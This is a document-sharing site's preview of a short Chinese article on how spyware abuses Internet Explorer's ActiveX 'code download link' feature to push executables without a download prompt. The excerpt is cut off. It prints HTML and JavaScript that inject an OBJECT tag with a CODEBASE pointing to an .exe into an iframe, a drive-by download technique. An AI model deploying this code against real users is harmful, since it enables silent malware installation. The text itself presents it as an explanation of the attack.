1/2
文档分类:IT计算机

利用互联网程序代码下载链接功能.docx


下载后只包含 1 个 DOCX 格式的文档,没有任何的图纸或源代码,查看文件列表

特别说明:文档预览什么样,下载就是什么样。

下载所得到的文件列表
利用互联网程序代码下载链接功能.docx
文档介绍:
编号:
时间:2021年x月x日

书山有路勤为径,学海无涯苦作舟
页码:第页 共2页

.
实例4 利用“互联网程序代码下载链接”功能
间谍软件攻击者会根据Microsoft网站上的知识库文章中贴出的某段样本程序代码来利用“互联网程序代码下载链接”功能。浏览带有此间谍软件的站点时,工作站会在没有文件下载提示的情况下接受恶意下载(就像已签署了安全性一样)。根据浏览器的安全性设定值,“安全警告”并不一定会显示。以下样本程序代码提供一个使用“互联网程序代码下载链接”功能的范例:

<HTML><HEAD><TITLE>Page of executable links</TITLE></HEAD>
<BODY>
<BR/>
<!-- hyperlink uses central script function called linkit() -->
<A HREF="" onclick = "return linkit ('signed-testfile.exe');"> SIGNEDCLOCK.EXE</A>

<SCRIPT>
// linkit puts filename into HTML content and spews it into iframefunction linkit(filename)
{
strpagestart = "<HTML><HEAD></HEAD><BODY><OBJECT CLASSID=" +
"'CLSID:15589FA1-C456-11CE-BF01-00AA0055595A' CODEBASE='";
strpageend = "'></OBJECT></BODY></HTML>";
runnerwin.document.open();
runnerwin.document.write(strpagestart + filename + strpageend);
window.status = "Done.";
return false; // stop hyperlink and stay on this page
}
</SCRIPT>

<!-- h
内容来自淘豆网www.taodocs.com转载请标明出处.
相关文档
非法内容举报中心
文档信息
  • 页数2
  • 收藏数0 收藏
  • 顶次数0
  • 上传人露露二天
  • 文件大小659 KB
  • 时间2021-05-20